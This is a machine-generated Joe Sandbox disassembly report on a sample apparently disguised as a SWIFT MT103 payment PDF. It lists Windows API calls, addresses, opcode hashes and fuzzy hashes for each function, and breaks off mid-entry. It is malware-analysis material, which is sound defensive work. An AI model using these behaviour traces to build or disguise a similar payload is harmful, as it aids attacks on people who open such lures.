                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                        • String ID: <$@
                                                        • API String ID: 1325244542-1426351568
                                                        • Opcode ID: 37de6a81de2e92a3a7c33e59a56a352562ae64e8dd0f63fa0e546b29f6a37d85
                                                        • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                        • Opcode Fuzzy Hash: 37de6a81de2e92a3a7c33e59a56a352562ae64e8dd0f63fa0e546b29f6a37d85
                                                        • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                        • __wsplitpath.LIBCMT ref: 004737E1
                                                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                        • _wcscat.LIBCMT ref: 004737F6
                                                        • __wcsicoll.LIBCMT ref: 00473818
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                        • String ID:
                                                        • API String ID: 2547909840-0
                                                        • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                        • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                        • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                        • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                        APIs
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                        • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                        • DeleteObject.GDI32(?), ref: 0045564E
                                                        • DeleteObject.GDI32(?), ref: 0045565C
                                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                        • String ID:
                                                        • API String ID: 2354583917-0
                                                        • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                        • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                        • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                        • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                        APIs
                                                          • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                        • GetMenu.USER32 ref: 004776AA
                                                        • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                        • _wcslen.LIBCMT ref: 0047771A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Menu$CountItemStringWindow_wcslen
                                                        • String ID:
                                                        • API String ID: 1823500076-0
                                                        • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                        • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                        • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                        • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                        • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                        • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$Enable$Show$MessageMoveSend
                                                        • String ID:
                                                        • API String ID: 896007046-0
                                                        • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                        • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                        • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                        • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                        APIs
                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                        • SendMessageW.USER32(02F51B00,000000F1,00000000,00000000), ref: 004414C6
                                                        • SendMessageW.USER32(02F51B00,000000F1,00000001,00000000), ref: 004414F1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow
                                                        • String ID:
                                                        • API String ID: 312131281-0
                                                        • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                        • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                        • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                        • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                        APIs
                                                        • _memset.LIBCMT ref: 004484C4
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                        • IsMenu.USER32(?), ref: 0044857B
                                                        • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                        • DrawMenuBar.USER32 ref: 004485E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                        • String ID: 0
                                                        • API String ID: 3866635326-4108050209
                                                        • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                        • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                        • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                        • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                        APIs
                                                        • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                        • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                        • Sleep.KERNEL32(0000000A), ref: 00472499
                                                        • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                        • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                        • String ID: 0vH
                                                        • API String ID: 327565842-3662162768
                                                        • Opcode ID: 1f9636da89c09a42c83bc6208b2a941288b856546e602fee390546c1bf7c6d32
                                                        • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                        • Opcode Fuzzy Hash: 1f9636da89c09a42c83bc6208b2a941288b856546e602fee390546c1bf7c6d32
                                                        • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                        APIs
                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                        • GetFocus.USER32 ref: 00448B1C
                                                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                        • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                        • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$Enable$Show$FocusMessageSend
                                                        • String ID:
                                                        • API String ID: 3429747543-0
                                                        • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                        • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                        • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                        • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                        • __swprintf.LIBCMT ref: 0045D3CC
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu$HH
                                                        • API String ID: 3164766367-3924996404
                                                        • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                        • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                        • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                        • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 3850602802-3636473452
                                                        • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                        • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                        • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                        • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                        APIs
                                                        • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                                        • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                        • DeleteObject.GDI32(?), ref: 0045564E
                                                        • DeleteObject.GDI32(?), ref: 0045565C
                                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                        • String ID:
                                                        • API String ID: 3985565216-0
                                                        • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                        • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                        • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                        • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                        • __calloc_crt.LIBCMT ref: 00415743
                                                        • __getptd.LIBCMT ref: 00415750
                                                        • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                        • __dosmaperr.LIBCMT ref: 004157A9
                                                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1269668773-0
                                                        • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                        • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                        • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                        • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                        APIs
                                                          • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                          • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                        • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                        • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                        • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                        • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                        • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                        • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                        • ExitThread.KERNEL32 ref: 004156BD
                                                        • __freefls@4.LIBCMT ref: 004156D9
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                        • String ID:
                                                        • API String ID: 4166825349-0
                                                        • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                        • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                        • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                        • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
